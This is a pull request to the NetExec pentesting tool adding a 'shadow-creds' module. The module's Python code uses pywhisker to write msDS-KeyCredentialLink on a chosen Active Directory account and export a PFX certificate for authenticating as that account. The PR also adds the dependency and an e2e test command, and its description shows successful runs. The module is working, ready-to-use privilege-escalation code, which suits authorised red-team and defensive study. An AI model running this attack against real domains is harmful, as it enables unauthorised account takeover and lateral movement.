### PR TITLE
Add Shadow credentials module !

### DIFF
--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -34,7 +34,7 @@ class _PywLoggerAdapter:
 
         if any(p in low for p in self._notfound_patterns):
             self.not_found = True
-            # downrank to verbose to avoid double-print; we'll emit a clear fail later
+            # downrank to verbose to avoid double-print
             if self.verbosity >= 2:
                 self.context.log.debug(txt)
             return

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -4,7 +4,9 @@ from datetime import datetime
 from pathlib import Path
 from types import SimpleNamespace
 from pywhisker.pywhisker import ShadowCredentials, init_ldap_session
-import secrets, string
+import secrets
+import string
+
 
 class _PywLoggerAdapter:
     """Forward pywhisker logs to NetExec's logger, and flag specific conditions."""
@@ -13,7 +15,7 @@ class _PywLoggerAdapter:
         self.verbosity = verbosity
         self.quiet = quiet
         self.perm_denied = False
-        self.not_found   = False
+        self.not_found = False
 
         self._denied_patterns = (
             "insuff_access_rights",
@@ -56,6 +58,7 @@ class _PywLoggerAdapter:
 
     def warning(self, msg):
         self.context.log.highlight(msg)
+
 
 class NXCModule:
     """
@@ -101,11 +104,11 @@ class NXCModule:
         self.out_dir.mkdir(parents=True, exist_ok=True)
 
     def _gather_conn_info(self, connection):
-        self.domain   = getattr(connection, "domain", None)
-        self.dc_ip    = getattr(connection, "dc_ip", None) or getattr(connection, "host", None)
+        self.domain = getattr(connection, "domain", None)
+        self.dc_ip = getattr(connection, "dc_ip", None) or getattr(connection, "host", None)
         self.username = getattr(connection, "username", None)
         self.password = getattr(connection, "password", None)
-        self.nthash   = getattr(connection, "nthash", None)
+        self.nthash = getattr(connection, "nthash", None)
         if not self.domain:
             self.context.log.fail("Missing 'domain' on connection")
             exit(1)
@@ -138,7 +141,6 @@ class NXCModule:
         srv, sess = init_ldap_session(args, self.domain, self.username, password, lmhash, nthash)
         context.log.debug("Created LDAP session via pywhisker.init_ldap_session()")
         return srv, sess
-
 
     def _step_shadow_creds(self, context, connection):
         # Create LDAP session

--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -1,0 +1,197 @@
+from nxc.helpers.misc import CATEGORY
+from nxc.paths import TMP_PATH
+from datetime import datetime
+from pathlib import Path
+from types import SimpleNamespace
+from pywhisker.pywhisker import ShadowCredentials, init_ldap_session
+import secrets, string
+
+class _PywLoggerAdapter:
+    """Forward pywhisker logs to NetExec's logger, and flag specific conditions."""
+    def __init__(self, context, verbosity=2, quiet=False):
+        self.context = context
+        self.verbosity = verbosity
+        self.quiet = quiet
+        self.perm_denied = False
+        self.not_found   = False
+
+        self._denied_patterns = (
+            "insuff_access_rights",
+            "00002098"
+        )
+        self._notfound_patterns = (
+            "user not found"
+        )
+
+    def info(self, msg):    self.context.log.info(msg)
+    def success(self, msg): self.context.log.success(msg)
+
+    def error(self, msg):
+        txt = str(msg)
+        low = txt.lower()
+
+        if any(p in low for p in self._notfound_patterns):
+            self.not_found = True
+            # downrank to verbose to avoid double-print; we'll emit a clear fail later
+            if self.verbosity >= 2:
+                self.context.log.debug(txt)
+            return
+
+        if any(p in low for p in self._denied_patterns):
+            self.perm_denied = True
+            if self.verbosity >= 2:
+                self.context.log.debug(txt)
+            return
+
+        # default: show as error
+        self.context.log.error(txt)
+
+    def debug(self, msg):
+        if self.verbosity >= 1:
+            self.context.log.debug(msg)
+
+    def verbose(self, msg):
+        if self.verbosity >= 2:
+            self.context.log.debug(msg)
+
+    def warning(self, msg):
+        self.context.log.highlight(msg)
+
+class NXCModule:
+    """
+    Module by @qu35t_tv
+    """
+    name = "shadow-creds"
+    description = "Exploits the Shadow Credentials attack to extract the authentication certificate from the target"
+    supported_protocols = ["ldap"]
+    category = CATEGORY.PRIVILEGE_ESCALATION
+
+    def __init__(self):
+        self.domain = None
+        self.dc_ip = None
+        self.username = None
+        self.password = None
+        self.nthash = None
+
+        self.target = None
+        self.pfx_pass = None
+        self.out_dir = None
+        self.paths = {}
+
+    def options(self, context, module_options):
+        """
+        Options:
+          TARGET=<sAMAccountName|user@domain>   (required)
+          PFXPASS=<password>                    (optional; default: random strong password)
+          OUTDIR=<path>                         (optional)
+        """
+        self.target = module_options.get("TARGET") or module_options.get("target")
+        if not self.target:
+            context.log.fail("TARGET is required (e.g., TARGET=svc_backup or TARGET=pc01$)")
+            exit(1)
+        self.pfx_pass = module_options.get("PFXPASS") or module_options.get("pfxpass") or None
+
+        ts = datetime.now().strftime("%Y%m%d-%H%M%S")
+        suggested = Path(TMP_PATH) / f"shadow-creds-{self.target}-{ts}"
+        self.out_dir = Path(module_options.get("OUTDIR") or module_options.get("outdir") or suggested).resolve()
+        return {"TARGET": self.target, "PFXPASS": "<auto>" if not self.pfx_pass else "<provided>", "OUTDIR": str(self.out_dir)}
+
+    # ---------------- helpers ----------------
+    def _ensure_outdir(self):
+        self.out_dir.mkdir(parents=True, exist_ok=True)
+
+    def _gather_conn_info(self, connection):
+        self.domain   = getattr(connection, "domain", None)
+        self.dc_ip    = getattr(connection, "dc_ip", None) or getattr(connection, "host", None)
+        self.username = getattr(connection, "username", None)
+        self.password = getattr(connection, "password", None)
+        self.nthash   = getattr(connection, "nthash", None)
+        if not self.domain:
+            self.context.log.fail("Missing 'domain' on connection")
+            exit(1)
+
+    def _get_ldap_handles(self, context, connection):
+        args = SimpleNamespace(
+            dc_ip=self.dc_ip,
+            dc_host=None,
+            use_ldaps=False,
+            use_schannel=False,
+            use_kerberos=False,
+            auth_hashes=None,
+            auth_key=None,
+            crt=None,
+            key=None,
+        )
+
+        password = self.password or ""
+        lmhash = ""
+        nthash = (self.nthash or "").lower()
+
+        if nthash:
+            if ":" in nthash:
+                lmhash, _, nt_only = nthash.partition(":")
+                lmhash = lmhash or ""
+                nthash = nt_only
+            args.auth_hashes = f"{lmhash}:{nthash}"
+            password = ""
+
+        srv, sess = init_ldap_session(args, self.domain, self.username, password, lmhash, nthash)
+        context.log.debug("Created LDAP session via pywhisker.init_ldap_session()")
+        return srv, sess
+
+
+    def _step_shadow_creds(self, context, connection):
+        # Create LDAP session
+        ldap_server, ldap_session = self._get_ldap_handles(context, connection)
+        logger = _PywLoggerAdapter(context, verbosity=0, quiet=False)
+
+        self._ensure_outdir()
+        base_path = str(self.out_dir / self.target)
+        self.paths["pfx"] = base_path + ".pfx"
+
+        # Generate PFX password
+        if not self.pfx_pass:
+            alphabet = string.ascii_letters + string.digits
+            self.pfx_pass = "".join(secrets.choice(alphabet) for _ in range(24))
+
+        sc = ShadowCredentials(
+            ldap_server, ldap_session,
+            target_samname=self.target,
+            target_domain=self.domain,
+            logger=logger
+        )
+
+        sc.add(
+            password=self.pfx_pass,
+            path=base_path,
+            export_type="PFX",
+            domain=self.domain,
+            target_domain=None
+        )
+
+        pfx_path = Path(self.paths["pfx"])
+        if not pfx_path.exists():
+            if logger.perm_denied:
+                context.log.fail("No permissions to modify msDS-KeyCredentialLink on the target (INSUFF_ACCESS_RIGHTS).")
+                return
+            if logger.not_found:
+                context.log.fail("TARGET not found in LDAP.")
+                return
+            raise RuntimeError("PFX not created by pywhisker API")
+        context.log.success(f"PFX password: {self.pfx_pass}")
+
+    def on_login(self, context, connection):
+        try:
+            self._gather_conn_info(connection)
+            self._ensure_outdir()
+            self.paths["dir"] = str(self.out_dir)
+            context.log.success(f"Output directory: {self.out_dir}")
+        except Exception as e:
+            context.log.error(str(e))
+            return
+
+        try:
+            self._step_shadow_creds(context, connection)
+        except Exception as e:
+            context.log.error(f"Shadow Credentials attack failed: {e}")
+            return

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -43,6 +43,7 @@ dependencies = [
     "termcolor>=2.4.0",
     "terminaltables>=3.1.0",
     "xmltodict>=0.13.0",
+    "pywhisker>=0.1.2",
     # Git Dependencies
     "impacket @ git+https://github.com/Pennyw0rth/impacket.git",
     "oscrypto @ git+https://github.com/wbond/oscrypto",

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -222,6 +222,7 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M subnets
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dump-computers
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o "TARGET=LOGIN_USERNAME"
 ##### WINRM
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig


### PR DESCRIPTION
## Description

This PR introduces the `shadow-creds` module, which leverages modification of the LDAP attribute `msDS-CredentialLink` on a target user in order to retrieve its authentication PFX certificate. 
The module is based on **pywhisker** by ShutdownRepo (Aka Charlie le king) and comes with options for customizing the PFX password and output directory.


### Options

<img width="1872" height="252" alt="6" src="https://github.com/user-attachments/assets/f387f6eb-ba6e-4ffe-9d17-1c8e008ef962" />

## Common errors (examples)

* TARGET is required

<img width="2010" height="88" alt="2" src="https://github.com/user-attachments/assets/0968a620-bd3b-4ee8-b86a-e0a7b02760de" />

* No permissions to modify msDS-KeyCredentialLink on the target (INSUFF_ACCESS_RIGHTS)

<img width="2854" height="184" alt="1" src="https://github.com/user-attachments/assets/603e8f8a-6b15-4b8e-826d-f48e0712ffa1" />

* Invalid account in LDAP

<img width="2822" height="196" alt="5" src="https://github.com/user-attachments/assets/dde8936a-b355-45c9-97cc-1c1758356d66" />

## Valid examples

* With valid permissions

<img width="3078" height="250" alt="3" src="https://github.com/user-attachments/assets/bdb14171-97a4-4b2b-95b0-7951e6f5de2f" />

* Authentication with exported PFX works

<img width="2802" height="116" alt="4" src="https://github.com/user-attachments/assets/cad18981-c236-4b07-8a46-f7205923b2b2" />

* NT_HASH authentication supported

<img width="3068" height="252" alt="10" src="https://github.com/user-attachments/assets/5bd25f50-4934-4231-9f48-3cb837facd47" />

* Custom PFX password

<img width="3054" height="260" alt="7" src="https://github.com/user-attachments/assets/4f6bd724-bcf6-4e06-b86e-fbe2cdd51b55" />

<img width="2796" height="120" alt="8" src="https://github.com/user-attachments/assets/357db883-4b6a-4bb0-90fc-b01c6bec7b40" />

* Custom Outdir

<img width="2804" height="240" alt="9" src="https://github.com/user-attachments/assets/1b2f1865-5963-42db-bda4-0fccaefe51c0" />

## Type of change
Insert an "x" inside the brackets for relevant items (do not delete options)

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [x] This change requires a documentation update
- [x] This requires a new third party (pywhisker)

## Setup guide for the review
* MacOS
* Linux

## Checklist:
Insert an "x" inside the brackets for completed and relevant items (do not delete options)

- [x] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] New and existing e2e tests pass locally with my changes
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (WIP...)
